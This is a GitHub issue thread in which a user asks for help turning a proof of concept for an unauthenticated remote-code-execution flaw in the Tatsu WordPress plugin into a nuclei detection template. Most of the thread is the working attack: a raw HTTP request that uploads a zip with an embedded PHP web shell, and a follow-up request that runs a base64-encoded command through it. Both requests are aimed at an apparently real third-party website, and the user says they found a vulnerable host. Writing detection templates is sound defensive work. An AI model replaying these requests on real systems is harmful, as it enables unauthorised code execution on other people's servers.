search

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
8.95k stars 2.56k forks source link

Tatsu < 3.3.12 - Unauthenticated RCE - help #4247

Open akincibor opened 2 years ago

akincibor commented 2 years ago

Hi,

Can someone help me to convert this python PoC into a template ?

https://wpscan.com/vulnerability/fb0097a0-5d7b-4e5b-97de-aacafa8fffcd

DhiyaneshGeek commented 2 years ago

@akincibor i checked the plugin, it seems be paid version https://tatsubuilder.com/

Let me know if i'm wrong

akincibor commented 2 years ago

Hi @DhiyaneshGeek

The first request upload a zip file (example.zip) containing a php file (.examplephp.php :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.wcsart.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Origin: http://www.wcsart.com
Referer: http://www.wcsart.com
Accept-Language: en-US,en;q=0.9
Content-Length: 509
Content-Type: multipart/form-data; boundary=5e77a7410a108fe824da522d90cb1200

--5e77a7410a108fe824da522d90cb1200
Content-Disposition: form-data; name="action"

add_custom_font
--5e77a7410a108fe824da522d90cb1200
Content-Disposition: form-data; name="file"; filename="example.zip"

PK\x03\x04\x14\x00\x00\x00\x08\x00h\x91\x19U\x0f\xe6\xc6\x08\x92\x00\x00\x00\xb8\x00\x00\x00\n\x00\x00\x00.examplefile.php\xb3\xb1/\xc8(PPIS\xb0UP\xca\xc9M\xad,.Q\xb2vPI\xb4\x05\nE\x9b\xc4\xea\x01Ic0\ta\x9b\x82I#0i\x18\x0bTX\x9e_\x94R\x0c\xd4\x9bXT\x94X\xa9\x91\x94X\x9cjf\x12\x9f\x92\x9a\x9c\x9f\x92\xaa\xa1\x12\x1f\xe0\x1f\x1c\x12\xad^\x92ZQ\xa2\x1e\xab\xa9i\xad\x92e\xab\x04V\xa8\xa4\xa7\x14\x0f\xc4i\x999%\xa9E \xfb \xac\xd4\x94x\x98y*Y\x1a\x10\xb3u\x14T\x125\xad\x1dJ\xf3r2\xf3\xb25\xe2\xe3\xdd<}\\\xe3\xe35\xad\x01PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00h\x91\x19U\x0f\xe6\xc6\x08\x92\x00\x00\x00\xb8\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00.examplefile.phpPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x008\x00\x00\x00\xba\x00\x00\x00\x00\x00
--5e77a7410a108fe824da522d90cb1200--

It should be uploaded in the endpoint /wp-content/uploads/typehub/custom/example/.examplefile.php

The second request is : 

POST /wp-content/uploads/typehub/custom/example/.examplefile.php HTTP/1.1
Host: www.wcsart.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Origin: http://www.wcsart.com
Referer: http://www.wcsart.com
Accept-Language: en-US,en;q=0.9
Content-Length: 7
Content-Type: application/x-www-form-urlencoded

text=d2hvYW1p

d2hvYW1p is base64(whoami)

akincibor commented 2 years ago

I think I found a vulnerable host, check Discord